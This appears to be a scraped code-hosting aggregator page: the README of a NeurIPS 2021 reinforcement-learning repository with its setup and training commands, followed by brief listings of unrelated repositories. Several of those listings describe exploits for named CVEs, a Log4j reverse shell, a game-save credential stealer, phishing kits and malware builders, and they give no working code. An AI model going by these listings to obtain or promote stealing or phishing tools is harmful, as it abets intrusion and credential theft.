Time Discretization-Invariant Safe Action Repetition for Policy Gradient Methods

Overview

Time Discretization-Invariant Safe Action Repetition for Policy Gradient Methods

This repository is the official implementation of

  • Seohong Park, Jaekyeom Kim, Gunhee Kim. Time Discretization-Invariant Safe Action Repetition for Policy Gradient Methods. In NeurIPS, 2021.

It contains the implementations for SAR, FiGAR-C and base policy gradient algorithms (PPO, TRPO and A2C).

The code is based on Stable Baselines3 (SB3) for PPO and A2C, and Stable Baselines (SB) for TRPO.

Requirements

Run examples

PPO and A2C (based on Stable Baselines3)

To install requirements:

cd sb3
pip install -r requirements.txt
pip install -e .

Train SAR-PPO on InvertedPendulum-v2 with δ = 0.01:

python repeat/main.py --env=InvertedPendulum-v2 --algo=ppo_rg --frame_skip=1 --dt=0.01 --max_t=0.05 --max_d=0.5

Train FiGAR-C-PPO on InvertedPendulum-v2 with δ = 0.01:

python repeat/main.py --env=InvertedPendulum-v2 --algo=ppo_rg --frame_skip=1 --dt=0.01 --max_t=0.05

Train PPO on InvertedPendulum-v2 with the original δ:

python repeat/main.py --env=InvertedPendulum-v2 --algo=ppo_rg

Train SAR-A2C on InvertedPendulum-v2 with δ = 0.01:

python repeat/main.py --env=InvertedPendulum-v2 --algo=a2c_rg --frame_skip=1 --dt=0.01 --max_t=0.05 --max_d=0.5

Train SAR-PPO on InvertedPendulum-v2 with δ = 0.002 and the "Action Noise" setting:

python repeat/main.py --env=InvertedPendulum-v2 --algo=ppo_rg --frame_skip=1 --dt=0.002 --max_t=0.05 --max_d=0.5 --anoise_type=action --anoise_prob=0.05 --anoise_std=3

Train SAR-PPO on InvertedPendulum-v2 with δ = 0.002 and the "External Force" setting:

python repeat/main.py --env=InvertedPendulum-v2 --algo=ppo_rg --frame_skip=1 --dt=0.002 --max_t=0.05 --max_d=0.5 --anoise_type=ext_f --anoise_prob=0.05 --anoise_std=300

Train SAR-PPO on InvertedPendulum-v2 with δ = 0.002 and the "Strong External Force (Perceptible)" setting:

python repeat/main.py --env=InvertedPendulum-v2 --algo=ppo_rg --frame_skip=1 --dt=0.002 --max_t=0.05 --max_d=0.5 --anoise_type=ext_fpc --anoise_prob=0.05 --anoise_std=1000

TRPO (based on Stable Baselines)

To install requirements:

cd sb
pip install -r requirements.txt
pip install -e .

Train SAR-TRPO on InvertedPendulum-v2 with δ = 0.01:

python repeat/main.py --env=InvertedPendulum-v2 --frame_skip=1 --dt=0.01 --max_t=0.05 --max_d=0.5

License

This codebase is licensed under the MIT License. See also sb3/LICENSE_SB3 and sb/LICENSE_SB.

Owner
Seohong Park
Seohong Park
Cve-2021-22005-exp

cve-2021-22005-exp 0x01 漏洞简介 2021年9月21日,VMware发布安全公告,公开披露了vCenter Server中的19个安全漏洞,这些漏洞的CVSSv3评分范围为4.3-9.8。 其中,最为严重的漏洞为vCenter Server 中的任意文件上传漏洞(CVE-20

Jing Ling 146 Dec 31, 2022
This is an injection tool that can inject any xposed modules apk into the debug android app

This is an injection tool that can inject any xposed modules apk into the debug android app, the native code in the xposed module can also be injected.

Windy 32 Nov 05, 2022
DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)

dnspooq DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685) For educational purposes only Requirements Docker compo

Teppei Fukuda 80 Nov 28, 2022
Hack computer in the form of RAR files from all types of clients, even Linux

Program Features 📌 Hide malware 📌 Vulnerability software vulnerabilities RAR 📌 Creating malware 📌 Access client files 📌 Client Hacking 📌 Link Do

hack4lx 5 Nov 25, 2022
This Repository is an up-to-date version of Harvard nlp's Legacy code and a Refactoring of the jupyter notebook version as a shell script version.

This Repository is an up-to-date version of Harvard nlp's Legacy code and a Refactoring of the jupyter notebook version as a shell script version.

신재욱 17 Sep 25, 2022
Tool ini berfungsi untuk membuat virus secara instan

vbug (ID) Tool ini berfungsi untuk membuat virus secara instan. Dengan begitu pengguna vbug maker dapat menggunakannya dengan mudah dan cepat. Di dala

OneTXz 3 Jun 05, 2022
Laravel RCE (CVE-2021-3129)

CVE-2021-3129 - Laravel RCE About The script has been made for exploiting the Laravel RCE (CVE-2021-3129) vulnerability. This script allows you to wri

Joshua van der Poll 21 Dec 27, 2022
An easy-to-use wrapper for NTFS-3G on macOS

ezNTFS ezNTFS is an easy-to-use wrapper for NTFS-3G on macOS. ezNTFS can be used as a menu bar app, or via the CLI in the terminal. Installation To us

Matthew Go 34 Dec 01, 2022
Growtopia Save.dat Stealer

savedat-stealer Growtopia Save.dat Stealer (Auto Send To Webhook) How To Use After Change Webhook URL Compile script to exe Give to target Done Info C

NumeX 9 May 01, 2022
Proof-of-concept obfuscation toolkit for C# post-exploitation tools

InvisibilityCloak Proof-of-concept obfuscation toolkit for C# post-exploitation tools. This will perform the below actions for a C# visual studio proj

259 Dec 19, 2022
web指纹识别工具

前言 一直苦于没有用的顺手的web指纹识别工具,学习前辈s7ckTeam的Glass和broken5的WebAliveScan优秀开源程序开发的轻量型web指纹工具。

EASY 966 Dec 26, 2022
A traceroute tool that also displays IP information

infotr A traceroute tool that also displays IP information. This tool has only been tested on Linux. Quick Start First, install this tool from PyPI. p

K4YT3X 10 Oct 29, 2022
Phishing-Crack tools to punish friends

Phishing-Crack Phishing Tool Version 1.0.0 Created By temirovazat A Phishing Tool With PHP and Python3 Features Fake Instagram Phishing Page Fake Face

3 Oct 04, 2022
GRR Rapid Response: remote live forensics for incident response

GRR Rapid Response is an incident response framework focused on remote live forensics. Build Type Status Tests End-to-end Tests Windows Templates Linu

Google 4.3k Jan 05, 2023
Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together.

RedTeam Toolkit Note: Only legal activities should be conducted with this project. Red Team Toolkit is an Open-Source Django Offensive Web-App contain

Mohammadreza Sarayloo 382 Jan 01, 2023
Just your basic port scanner - with multiprocessing capabilities & further nmap enumeration.

Just-Your-Basic-Port-Scanner Just your basic port scanner - with multiprocessing capabilities & further nmap enumeration. Use at your own discretion,

Edward Zhou 0 Nov 06, 2021
Log4j2 CVE-2021-44228 revshell

Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

FaisalFs 16 Mar 24, 2022
Sudo Baron Samedit Exploit

CVE-2021-3156 (Sudo Baron Samedit) This repository is CVE-2021-3156 exploit targeting Linux x64. For writeup, please visit https://datafarm-cybersecur

Worawit Wang 559 Jan 03, 2023
The Decompressoin tool for Vxworks MINIFS

MINIFS-Decompression The Decompression tool for Vxworks MINIFS filesystem. USAGE python minifs_decompression.py [target_firmware] The example of Mercu

8 Jan 03, 2023